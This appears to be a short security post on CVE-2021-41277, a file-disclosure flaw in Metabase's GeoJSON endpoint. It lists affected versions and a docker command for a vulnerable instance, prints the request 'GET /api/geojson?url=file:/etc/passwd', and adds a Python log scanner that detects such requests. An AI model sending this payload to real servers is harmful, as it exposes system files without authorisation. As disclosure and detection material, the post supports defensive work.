CVE-2021-41277 Metabase sensitive information disclosure

Affected versions:
Metabase < 0.40.5
Metabase >= 1.0.0, < 1.40.5

Vulnerable test instance:
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

Request:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1
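To check whether an instance has received the request shown above, the following added example (not part of the original post and not Metabase code) scans access-log lines for /api/geojson requests whose url parameter is anything other than http or https. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Nov/2021:10:00:01 +0000] "GET /api/geojson?url=file:/etc/passwd HTTP/1.1" 200 1532',
    '198.51.100.4 - - [21/Nov/2021:10:00:05 +0000] "GET /api/geojson?url=https%3A%2F%2Fmaps.example.com%2Fworld.json HTTP/1.1" 200 9001',
    '203.0.113.7 - - [21/Nov/2021:10:00:09 +0000] "GET /api/geojson?url=file%3A%2Fetc%2Fpasswd HTTP/1.1" 200 1532',
    '198.51.100.4 - - [21/Nov/2021:10:00:12 +0000] "GET /api/user/current HTTP/1.1" 200 310',
]

def suspicious_geojson_url(target):
    """Return the decoded url parameter when the request targets /api/geojson
    with a non-http(s) value, otherwise None."""
    parts = urlsplit(target)
    if parts.path.rstrip("/").lower() != "/api/geojson":
        return None
    # parse_qs percent-decodes, so encoded and plain forms compare equal.
    for value in parse_qs(parts.query, keep_blank_values=True).get("url", []):
        cleaned = value.strip()
        if urlsplit(cleaned).scheme.lower() not in ALLOWED_SCHEMES:
            return cleaned
    return None

def scan(lines):
    """Return (line number, client address, decoded url value) for each hit."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        value = suspicious_geojson_url(m.group("target"))
        if value is not None:
            hits.append((lineno, line.split()[0], value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 response on a version in the affected ranges above is worth treating as a possible file read and reviewing alongside an upgrade.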




#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest
